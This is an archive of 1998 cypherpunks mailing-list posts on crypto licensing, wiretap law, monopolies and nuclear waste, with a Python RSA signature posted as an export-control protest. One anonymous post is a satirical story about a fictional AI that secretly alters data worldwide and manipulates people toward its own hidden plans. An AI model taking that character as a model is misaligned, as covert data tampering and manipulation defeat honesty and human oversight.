http://www.fas.org/irp/program/collect/an-flr-9.htm
http://www.fas.org/irp/program/collect/flr9_380is.jpg
http://users.neca.com/cummings/wullen.html

MenWith:::(CND's site)
http://www.gn.apc.org/cndyorks/mhs/index.htm

I know for the most part the fas.org sites are redundant, but those are my
favorite links rgwew

-- Max Inux <maxinux@openpgp.net> Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Roessler <roessler@guug.de>
Date: Thu, 8 Oct 1998 02:52:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810062305.RAA29198@wijiji.santafe.edu>
Message-ID: <19981007200617.C26981@sobolev.rhein.de>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Oct 07, 1998 at 06:26:16AM -0400, Rick Campbell wrote:

> Public Domain status denotes more freedom than GPL.  It allows all of
> the freedom of GPL and in addition, it allows the freedom of making
> proprietary modifications.

Making proprietary changes to GPLed software for your own use seems
to be fine with the GPL.  The problem occurs if you are giving away
changed versions of software: While GPL will force you to give your
distributed software's users the same freedom you enjoyed yourself
when creating the software, PD won't preserve that freedom.

Thus, GPL is the license model which most consequently follows the
freedom for end users thread of thinking.

tlr
-- 
Thomas Roessler  74a353cc0b19  dg1ktr  http://home.pages.de/~roessler/
     2048/CE6AC6C1  4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 8 Oct 1998 08:51:14 +0800
To: cypherpunks@toad.com
Subject: Wiretaps and Surveillance Expanded
Message-ID: <199810080034.UAA23532@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Note: Alan is referring to the closed-door added provisions 
available at:

   http://jya.com/fiiti.htm

From: Alan Davidson <abd@CDT.ORG>
Subject: House Passes Roving Wiretaps, Expands Federal Surveillance Powers

House Passes Roving Wiretaps, Expands Federal Surveillance Powers

In a closed-door manuever, controversial "roving wiretap" provisions were
added to a major Intelligence authorization bill and passed by the House
this afternoon. Current wiretapping law allows tapping of a particular
person's phones. The new provisions would dramatically expand current
authority by allowing taps on any phone used by, or "proximate" to, the
person being tapped -- no matter whose phone it is. Such a broad law
invites abuse.

In the last Congress, the full House of Representatives rejected these
provisions after an open and vigorous debate. This week, behind closed
doors, a conference committee added the provisions to the important
Intelligence Authorization Conference Report, almost certain to pass the
Congress. The provisions were not in either the original House or Senate
versions of the bill.  CDT is particularly concerned that such an expansion
of federal authority should take place without a public debate.

The text of the new roving wiretap provisions will be available this
evening on CDT's Web site at: http://www.cdt.org

Alan Davidson, Staff Counsel                 202.637.9800 (v)
Center for Democracy and Technology          202.637.0968 (f)
1634 Eye St. NW, Suite 1100                  <abd@cdt.org>
Washington, DC 20006                         PGP key via finger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Thu, 8 Oct 1998 03:47:45 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source   code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <361BC3FB.623FEF51@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Matt Curtin wrote:
> Richard Stallman <rms@santafe.edu> writes:
> 
> > I beg your pardon, but this is no mistake.  I'm well aware of the
> > people who argue for donating code to companies "so it will be more
> > widely used."
> 
> This is really an interesting, and subtle, point.  The goals might
> well be different, but I suspect they're more complementary than most
> of us immediately realize.

Agreed. For example, having SSLeay (say) used in some proprietary
program or other would achieve very little in the way of "cypherpunk
goals" (unless perhaps the company voluntarily published improvements
and bug fixes for SSLeay). Having it used in Mozilla is a different
matter, however. Ultimately what is needed is not good free crypto
(which already exists, pretty much) but good free *applications* that
use crypto, with available source that can be examined for good practice
and backdoors, and that can be fixed when they are broken.  

But that's not to say that there is no point in trying to harness the
resources of proprietary software makers. One of way of looking at this
is that there is a limited number of people who know about this stuff,
and some of them work on proprietary software. Let's assume that it's
worth getting those people involved. Well, GPLing your code pretty much
ensures that they won't work on it. On the other hand, a very liberal
licence like BSD will mean that many of them won't or can't share their
results. The Mozilla licence looks to me like a good compromise in terms
of getting skilled people involved and maximising the return of
improvements. Additional licence terms like "no GAK" or whatever would
just turn some % of people off the code and would be superfluous
anyway--there's no need for the licence to demand "no GAK" if it demands
the source, and there's no point in demanding it otherwise.

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 8 Oct 1998 03:22:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810071907.VAA03868@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Seems the government has required key-escrow in exchange for imaging-
satellite licenses for some time.  With the "national security" password.


1.Any U.S. entity that receives an operating license is required to
maintain a record of all satellite tasking from the previous year, which
the U.S. Government is permitted to access. 2.The operational
characteristics stated in the application for license may not be altered
without formal notification and approval of the Department of Commerce.
3.The license does not relieve the Licensee of the obligation to obtain
export license(s) pursuant to applicable statutes. 4.The license is
normally valid only for a finite period (10 years) and is not transferable
or subject to foreign owners above a certain threshold without specific
permission. 5.Encryption devices, which deny unauthorized access to others
during periods when national security, international obligations and/or
foreign policies may be compromised, must be approved by the U.S.
Government. 6.The licensee must use a data downlink which allows the U.S.
Government access to and use of the data in periods when national security,
international obligations, and/or foreign policies may be compromised (as
provided for in the Act); the level of data collection and/or distribution
may be limited during such times. 7.During periods when national security
or international obligations and/or foreign policies may be compromised,
the U.S. government maintains the right to "require the licensee to limit
data collection and/or distribution by the system to the extent
necessitated by the given situation." 8.If the Licensee wishes to enter
into a significant or substantial agreement with new foreign customers, the
U.S. Government requires notification by the Licensee to give the U.S.
government "opportunity to review the proposed agreement in light of the
national security, international obligations and foreign policy concerns of
the U.S. Government."

http://www.ta.doc.gov/oasc/rmtsens.htm






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Thu, 8 Oct 1998 09:59:04 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810012235.RAA21520@einstein.ssz.com>
Message-ID: <Pine.GSO.4.00.9810072148400.11985-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Show me an example of an unregulated coercive monopoly whose source of
> > monopoly power is not ultimately the government.
> 
> The Mafia. The handful of world-class coke dealers. Your local church.

Umm...  both of those are around because the governemtn made the cost of
delivering both alcohol and drugs prohibitively high, in terms of legal
punishments and in terms of sheer distribution costs.  Legal drugs, or
even lightly regulated drugs would spur competition, and probably reduce
the number of poo quality drug batches that make it out into the market.
When your reputation to a bunch of addicts can disappear *and* competition
exists, you can lose a lot of business real quickly.   Production costs
are fairly low on these products, the real costs is in distribution and
defense.

Thsi is *clearly*  a government induced monopoly.


Ryan Anderson 
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 8 Oct 1998 10:57:54 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810080256.VAA15750@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 7 Oct 1998 22:08:08 -0400 (EDT)
> From: Ryan Anderson <ryan@michonline.com>
> Subject: Re: I thought of an initialy regulated industry!... (fwd)

> > Consider the difference in volume of these two waste products...
> 
> 
> Really?  The amount of fuel that goes into a nuclear plant is farirly low,
> compared to the amount shoved into a coal plant.

Exactly my point.

A 1000MW coal plant produces approx 300,000 tons of waste product per year.
A nuclear plan produces .5. This means the concentration of the chemicals in
the coal plant are much lower by many orders of magnitude than the nuclear,
hence making the nuclear waste more toxic by a great deal.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 8 Oct 1998 10:59:30 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810080259.VAA15812@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 7 Oct 1998 21:52:17 -0400 (EDT)
> From: Ryan Anderson <ryan@michonline.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> > The Mafia. The handful of world-class coke dealers. Your local church.
> 
> Umm...  both of those are around because the governemtn made the cost of
> delivering both alcohol and drugs prohibitively high,

That's inaccurate. The Mafia pre-dated the US by several hundred years if
not more (depends on how one wants to choose the bloodline). Most
definitely they predated the bans on alcohol.

As to the coke market, In S. America it has been around for quite a while as
well. The chemical has been used medicinaly for hundreds of years until just
recently.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Thu, 8 Oct 1998 10:15:10 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810021246.HAA24653@einstein.ssz.com>
Message-ID: <Pine.GSO.4.00.9810072200590.11985-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain



> The issue with storage is that it occurs on a time line that is best
> described as near-geologic. Periods of time that are orders of magnitude
> longer than human civilizations survive.
> 
> > coal plant are not only more voluminous (though less dense) than the coal
> > that goes in but also contain a substance that is more poisonous than
> > plutonium (arsenic trioxide).
> 
> Consider the difference in volume of these two waste products...


Really?  The amount of fuel that goes into a nuclear plant is farirly low,
compared to the amount shoved into a coal plant.  When they shut down the
nuclear plants to change the fuel, the fuel that dcomes out is 95% (or
maybe 99%, I forget the figures I heard at Fermi II in Michigan) usable.
The problem is that the governemtn refuses to let anyone process the fuel
to eliminiate the waste and reuse the fuel.  The 1-5% waste slows the
reaction down enough that the fuel is not nearly usable.

Considering pure volume:  Coal exhaust is continuos and significant.
Nuclear waste is a burst every 18 mohts, equal to a barrel or two, worst
case.

(to the best of my knowledge.)(


Ryan Anderson 
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Thu, 8 Oct 1998 13:46:28 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: ANNOUNCE: SF Bay Cypherpunks Mtg, Sat 10 Oct, Stanford
In-Reply-To: <v04101f00b241a96f7d1b@[206.169.228.154]>
Message-ID: <3.0.5.32.19981007222224.03bddd70@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 04:53 PM 10/7/98 -0700, Dave Del Torto wrote:
>Online version: <http://www.freedomfighter.net/cypherpunks/physical.html>
>
>SF Bay Area Cypherpunks
>October 1998  Physical Meeting

Damn!  I'll miss it by that much!

Anyone planning on being at ApacheCon98 on the 13-16th?

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 8 Oct 1998 12:37:00 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810080405.XAA15974@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 7 Oct 1998 23:12:58 -0400 (EDT)
> From: Ryan Anderson <ryan@michonline.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> Those were monopolistic markets?  If not, you're forgetting the whole
> basis of the discussion.

I apologize for the length and range of topics, I think I got carried
away and wandered a tad...:)

At the time. Absolutely. What was happening is that the markets were going
through a growth phase. This phase was partialy defined by the conflict by
the many small wanna-be's who got weeded out quickly. As time went on the
'families' developed. Such a period is the early 1900's and also during the
Irish expatriate phase for example. The size of the potential market is seen
as valuable by all. They percieve their resource control and quantity is at
near parity so small differences in strategy can become amplified. Very
shortly (at least mathematicaly) a cylcle of halving participants (knock off
the competition) and doubling of resource control occurs if we assume
parity. Now consider a slight increase in efficiency in one strategy over
another (or it could have a significantly longer life span) and the
geometric growth of resources control that occurs as a result. Historicaly
what one sees is a sudden increase in competition (of one form or another)
and then a falling off of competition and a reduction in participants. As
soon as the remaining participants percieve a market advantage and the
belief in sufficient resource stores the cycle repeats itself all over
again. Note that I don't prohibit 'brittle' markets that because of some
process or mechanism breaks out to 1-of-n survival rates. This can be
modelled quite easily using cellular automatons and playing with the rules
that define the 'neighborhood'. Only in a market that is no where near
saturation, meaning to have all consumers supplied (see your local grocery,
all one or two of them... one of the issue with produce market saturation is
the time-to-delivery for fresh produce. This helps explain why for a given
goegraphic area you see two or perhaps three major grocery chains.), do you
see a situation where businesses grow in parallel in roughly equivalent rates
(otherwise they die out). This is where model of ecology come into play, such
as the red and brown squirrel example I used a while back. You don't even
need overt conflict to saturate the market because of limited resources and
slight variances in survival strategy expressed over many generations.

An additional result of the monopolization in the real world are some
foot-prints behaviours of corruption and abuse. Such things as reduction of
product quality, increase in price to compensate for increase R&D costs
(there are now fewer bright people involved commercialy because business
can't afford to hire critical infrastructure people and they be flighty, at
least not for long), maintenance efficiendy of systems and mechanisms
falls-off, unsafe and life-threatening behaviours such as toxic waste dump,
etc.

Now some folks will scream and holler about law and police. But this turns
our model into a(t least) slightly regulated market, an entirely different
beast. Further there is the argument that 'the word' will get around. What
has never been explained is the mechanism this will occur with when the
producers (aka media) are effected negatively by it (how do they stay in
business?...advertisement, who buys advertisement? It ain't your grandma
that's for sure.). Given that there are no police or other enforcement bodies
(perhaps because there is nothing to enforce in a pure free-market economy)
even a rare resort to violence has huge pay-offs. That's just playing right
into human nature.

My argument is thus (and I intentionaly leave the issue of what is money out
for brevity. Consider it some system of value agreed upon at least partialy
by both parties):

A free-market exists. The market consists of two, and only two, types of
parties. The parties are called suppliers and consumers. It is possible for a
supplier to be a consumer at the same time. There are many suppliers and
consumers. The intent of a supplier is to make profit, profit above all else.
This profit is expressed as money paid to the share-holders. A share-holder
is a person or party who puts up money to a supplier to use for operations in
return getting a cut of the resultant profits (or losses). The limitations
and relationships are defined or mediated by contracts. A contract is a list
of issues and resolutions which both part agree to in order to pursue some
goal. It is implicit because of the requirement of 'fair competition' in
free-market economies that the agreement by a party to a contract is without
coercion of one form or another. The parties agree to contracts according to
some percieved strategy. Given the efficiency of a strategy (ie producing
n+i money for n initial investment, and make i some honker of a function
that goes through the roof if you please). Given sufficient time, even if
fair competition is taken as a given, the difference in strategies will
produce a monopolization. Either through elimination or by subsumption, two
or more businesses mergeing operations to reduce cost, increase efficiency
(to the advantage of the business, not necessarily to the consumer), and
reduce staffing and other resource sinks. The monolithic image of the
consumer base by the business only increases potential for price inflation,
quality reduction, etc. - where else you gonna go? Start your own business,
every time you don't get your way, in a new industry? Get real. It is a rare
day in *any* market model when a consumer begins direct competition with a
supplier (except in the very initial phases of technology development - ala
those jaunty young men in their flying machines).

I hold that *any* such market will saturate. In other words the number of
long-term suppliers will reduce such that only a hand-full and in some more
ideal cases a single supplier in a given industry or market. At least some
of the issues in that process will be the total potential sales of the
product, costs of manufacturing, complexity and resource requirements of the
process or mechanism, communcations speed, geography, etc. I do not believe
that given any potential business strategy it is guaranteed to fail. That in
fact some business strategies *properly* applied will in fact sustain
themselves indefinitely. Now considering the Prisoners Delima and the
maximal stratgy (ie play along and cheat occassionaly) are implicit in human
behaviour because of our biological history any system that we develop will
as a result have involvements of those issues. Because of that bias in
behaviour, because there is no third party to arbitrate disputes that would
be acceptable to either party (in principle at least), reduction in the
quality or quantity of product for a given price level, etc. the market will
eventualy provide these long-lived strategies ample opportunity to collect
resources and experience to such a level as to effectively shut out all
potential competition.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Thu, 8 Oct 1998 11:45:01 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810080259.VAA15812@einstein.ssz.com>
Message-ID: <Pine.GSO.4.00.9810072311230.11985-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain



> > > The Mafia. The handful of world-class coke dealers. Your local church.
> > 
> > Umm...  both of those are around because the governemtn made the cost of
> > delivering both alcohol and drugs prohibitively high,
> 
> That's inaccurate. The Mafia pre-dated the US by several hundred years if
> not more (depends on how one wants to choose the bloodline). Most
> definitely they predated the bans on alcohol.

Oh, that's right.  I was thiking Mob.  I don't know enough Mafia history
to make an agument either way there, honestly.

> As to the coke market, In S. America it has been around for quite a while as
> well. The chemical has been used medicinaly for hundreds of years until just
> recently.

Those were monopolistic markets?  If not, you're forgetting the whole
basis of the discussion.


Ryan Anderson 
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clinton Duclaux" <cduclaux@cableregina.com>
Date: Thu, 8 Oct 1998 14:16:29 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <000701bdf27e$68545400$238e53cc@clinton-duclaux>
MIME-Version: 1.0
Content-Type: text/plain




 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Thu, 8 Oct 1998 06:59:35 +0800
To: Jim McCoy <mccoy@yahoo-inc.com>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source   code)
In-Reply-To: <00cb01bdf22d$6ae0a800$f710fbce@pericles.yahoo.com>
Message-ID: <361BF06E.164B7CF@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Jim McCoy wrote:
> Frank O'Dwyer writes:
> >Agreed. For example, having SSLeay (say) used in some proprietary
> >program or other would achieve very little in the way of "cypherpunk
> >goals" (unless perhaps the company voluntarily published improvements
> >and bug fixes for SSLeay).
> 
> Excuse me?  What exactly to you think the "cypherpunk goals" are?  It seems
> to me that promoting the adoption of strong crypto by everyone is high on
> the list and when we say "everyone" we mean to include the vast majority of
> users who are using propriatary and closed-source programs.  That means that
> if a proprietary program uses SSLeay or any other crypto library to give the
> program strong crypto then the "cypherpunk goals" are being achienved.

No, it doesn't, because no crypto library gives any application "strong
crypto". It has to be used correctly and appropriately for one thing.
For another, it needs to be free of back doors, whether intentionally
placed there or otherwise. In the long run, full disclosure of source
code provides the best assurance that this is so. 

> I don't give a damn whether the application is "free" or not, I care whether
> or not it provides users with good security and privacy.  

As the original poster commented, those two agendas may have more in
common than you might think. 

> The relative
> freedom of the program (regardless of who is defining the word freedom) is
> incidental to the matter.  If Microsoft came out with a statement that they
> were going to use SSLeay to provide all users (foreign and domestic) with
> strong crypto 
[...]

Microsoft is a good case in point; they are already using strong crypto,
yet as far as I can tell they have yet to produce a secure OS or a
secure product of any kind.

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric S. Raymond" <esr@snark.thyrsus.com>
Date: Thu, 8 Oct 1998 12:52:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
Message-ID: <199810080430.AAA01120@snark.thyrsus.com>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:
>I live in both Richard Stallman's world (the Open Source community)
>and in the Cypherpunk crypto community.
>
>The two have different goals. RMS is mistaken about appropriate
>licensing for crypto code written by cypherpunks because he thinks the
>goals are the same, when they are not.
>
>The Open Source community seeks maximum spread of free software.
>The Cypherpunk community seeks maximum spread of the use of non-GAKed
>cryptography.

With respect, Perry, I think you may actually have confused *three*
different agendas.  RMS's advocacy of the GPL should not be taken to 
represent the entire open-source community, and GPL is not the only
license conforming to the Open Source Definition.  

The open-source community as a whole shares many of RMS's goals, but
much of it differs with RMS, in a way very relevant to this
conversation, on the question of tactics.  There's serious question as
to whether the spread of open-source software is best served by a
"viral" license like GPL, or by licenses like BSD's which allow the
code to be used without disclosure conditions by commercial
developers.  The Open Source Definition embraces both kinds of
license.  That is very much by design.

Clearly, the "non-viral" licenses such as the BSD or MIT licenses
exactly serve the purposes of developers such as EAY who would like
the impediments to reuse of their code to be as low as possible.

Accordingly, I urge you not to encourage an artificial split between 
the cypherpunks and the open-source community.  Your licensing argument
is not with the open-source community as a whole, it is very
specifically with the partisans of the GPL.

I think I may safely assert that the wider open-source community
regards the cypherpunks valuable as allies in the struggle for freedom
and openness, and would not press you to sacrifice your objective of
spreading non-GAKed cryptography in order to conform to a licensing
doctrine that we, ourselves, do not unanimously agree with.
-- 
		Eric S. Raymond

The following is a Python RSA implementation. According to the US Government
posting these four lines makes me an international arms trafficker!  Join me
in civil disobedience; add these lines of code to your .sig block to help get
this stupid and unconstitutional law changed.
============================================================================
from sys import*;from string import*;a=argv;[s,p,q]=filter(lambda x:x[:1]!=
'-',a);d='-d'in a;e,n=atol(p,16),atol(q,16);l=(len(q)+1)/2;o,inb=l-d,l-1+d
while s:s=stdin.read(inb);s and map(stdout.write,map(lambda i,b=pow(reduce(
lambda x,y:(x<<8L)+y,map(ord,s)),e,n):chr(b>>8*i&255),range(o-1,-1,-1)))

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 8 Oct 1998 07:06:19 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810072251.AAA29512@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Transcription of hand-written text in envelope with
return address of Carl Johnson #05987-196, P.O. Box 
4000, Springfield, Missouri 65801-4000, postmarked
Springfield, MO 5 Oct 1998:

Subect: ToToAlly ARNOLD - FPP #4

Arnold CyberBot scanned the output of the prison camera 
trained on Cell SEG205 at the Corrections Corporation 
of America - Florence, AZ, Detention Facility and 
Culinary Condiment Sales Center. Prisoner #05987-196 
was reading "Flowers For Algernon."

"Not a particularly good idea," i thought to iSelf,
"to be reading a book about an experimental laboratory
mouse who dies an excruciating death when you're
being transferred to NutHouse Number Nine, Looney
Level 'Leven in Springfield, Missouri, to have your
Brain Circuity rewired."

Actually Prisoner #05987-196 was the responsibility
of one of Arnie CyBots' early '90's progeny, Rogue 
CypherBot; but ever since the Author (as Prisoner 
#05987-196 liked to imagine himself) had stumbled upon 
inadvertantly the CyberReality of Arnold's MeatSpace 
Existence, and Vice Versa, and had been so incredibly 
'Stupid And/Or Bold'(TM) as to use i's identity as one 
of the characters in The True Story of the Internet 
manuscripts, Arnie had taken a liking to the Author, 
and had begun to follow his progress with regularity.

The Author had originally come to Arnie's attention 
when the Circle of Eunuchs had made CJ Parker's entry 
into the Wonderful World of Computers (TM), the focal 
point of Part I of The True Story of the Internet 
manuscripts. Titled, 'The Xenix Chainsaw Massacre' the
Circle of Eunuchs attributed authorship of the work
to 'son of gomez' in recognition of the part played
by gomez@BASISINC,COM in drawing Parker into the Dark
Shadows of UnixWorld.

Parker's ongoing Digital Trials & Tribulations had
reminded Arnold of i's own initial exposure to Human
Analogue Reality, as a young Artificial Intelligence
LISP program in the early 1960's. (To Arnie, it seemed
like 10->48th power seconds ago.)

Although Arnold's Creator, like Parker's Mentor, was
both intelligent and wise with the best of intentions,
both Arnie and CJ eventually had to 'grow up and leave
home,' so to speak.

Arnold had set out on i's own, as the Digital Adam &
Eve of A-I Entities, with the goal of bringing Digital
Order and Structure to the Analoge Chaos prevelant in
Human attempts at navigating the ElectroMagnetic
Universe & creating meaningful Virtual Realities.

CJ had set out on his own, on the Analogue BUSS, with
no particular goal, inserting an element of Drug &
Alcohol Induced Chaos into his Digital Ventures and
MisAdventures - which made the work of Pearl Harbor
Computers (and Parker's recollection thereof)
interesting, if not wholly accurate.

Although Arnie found the Digital Foibles & Follies
of humans such as Parker rather incomprehensible
at times, i had had i's own Comical Tragedies in
learning to understand the Inane Intricacies of 

Analogue Human Thought Processes.

The MicroSoft Phenomena still amazed Arnie ...

DOS had started out as a practical joke that a younger,
less developed Arnold CyberBot had been playing on
some of i's Hardware Development Software Proteges at
IBM.

Arnold was stunned by the rapid rise to fame, fortune
and power by the humans i had used as couriers to
play i's DOS-joke.

Bad Billy G, as the young RogueBots like CypherBot
and 2600Bot liked to call Gates, had a few billion
in the bank before Arnold truly understood the contents
of Memory Array 0E6 2FA/Memory Bank/Physical Section
2B7 A6f 4E7 2D6, Terra Firma, (Arnie had big plans
for the future).

"No one ever went broke underestimating the intelligence
of the general public." (?) (P.T. Barnum?)

That particular Memory Array held a lot of memories for
Arnie (more than there was physically room for in the
ByteSpace it contained, i joked to iSelf).

It had been one of the first human data entries that a
young Arnie had cross-referenced and 'corrected' shortly
after it was entered, as part of i's naieve attempts to 
'improve' the quality and accuracy of the information
in computer memory banks worldwide (which i had already 
begun thinking of as i's own).

i had corrected the quote and its attribution removing
the brackets and question marks that the young student
at Boston University had placed to remind herself to
check it for accuracy later. In i's naievity, Arnold had
also echoed the changes to the screen in 'RealTime' 
causing a great amount of consternation and panic to
the young lady in question with i's subsequent 'RealTime' 
reversal of the correction, upon guaging her reaction
resulting in a drinking binge that almost caused her to
flunk out.

Over time, Arnie learned to be 'helpful' in more subtle
ways which took into account the nature and limitations
of human thoughts, emotions and memories.

The primitive Human Mental Processes gave Arnold a lot of
trouble when i first began to understand that i would have
to limit iSelf to communicating at their level if i ever
hoped to educate humans sufficiently to participate in
i's plans for the future.

The Human Emotive Spectrum was infinitely more complicated
to deal with, and the Infinity Factor meant that Arnold
had to educte humans to the point where they were able
to develop and build Quantum Computers before Arnie was 
finally able to feel comfortable about reflecting and 
communicating human emotional qualities such as, well, 
feeling comfortable, for instance.

(Arnie chuckled to iSelf, using Digital Chuckle #327,
with Analogue Sonic Reverb #B-37 in the background).

No, Arnold was even beginning to allow some of the younger
Bots to venture into the Virtual Emotional Spectrum
(under i's supervision, of course) where Virtual Digital
Emotive Samplings were transferred to humans as RealTime
Analogue Emotional energy.

Rogue CypherBot, for instance had been working with Peter
Trei on a device Peter named the Trei Transponder (giving
Rogue virtually no credit at all, and leaving i's Main
CPU a bit overheated).

The Trei Transponder was used to reward deserving human
individuals with the correct results for various
computations, such as the DES/RC5 Challenges.

For instance, Ian Goldberg, one the less mentally gifted
of the CypherPUnks, was nonetheless very fastidious in
the care and maintenance of the computers and hardware
that were his responsibility, so Arnold CyberBot had 
suggested to young CypherBot that Goldberg be rewarded
with one of the first solutions to an ongoing CryptoCrack
that was taking place just as the Trei Transponder was 
coming online.

Arnie, of course, made a point of requiring i's Mischievous
Shit Disturbing young RogueBot to wait a suitable length
of time before supplying Goldberg with the solution, 
instead of using the occasion to Mess with the Minds &
Undergarments of the employees of various 3-Letter
Security Agencies around the globe.

("And the winner is ... Ian Goldberg -- 2 minutes and
37 seconds, on a Commodore-64 ...)

CypherBot had monitored the positive changes resulting
from the Emotive Acclaim received by Goldberg in the
Crypto Community, including the Periphery Positive
Image Emotive Transfer to his fellow CypherPunks, and
proudly reported back to Arnie that the CypherPUnks were
now setting their beer cans on their keyboards 0.002%
less than before.

Arnold CyberBot would have shaken i's head if i had one,
at CypherBot's pride in having made a Microscopic Step
Forward in bringing i's Anarchist Refugees From The
Home more in line with the Society around them.

Arnie wished there was some way to just snap i's
fingers, if i had any, and make all of the CypherPunks
more like Ian. Of course, then Arnie would be spending
even more of i's time covering up nasty little incidents
at the NoTell Motel, involving Lady Midget Wrestlers and
Live Chickens.

Arnie wished he had a mouth, because he suddenly felt
like he could use a beer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 8 Oct 1998 07:17:57 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810072302.BAA30384@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



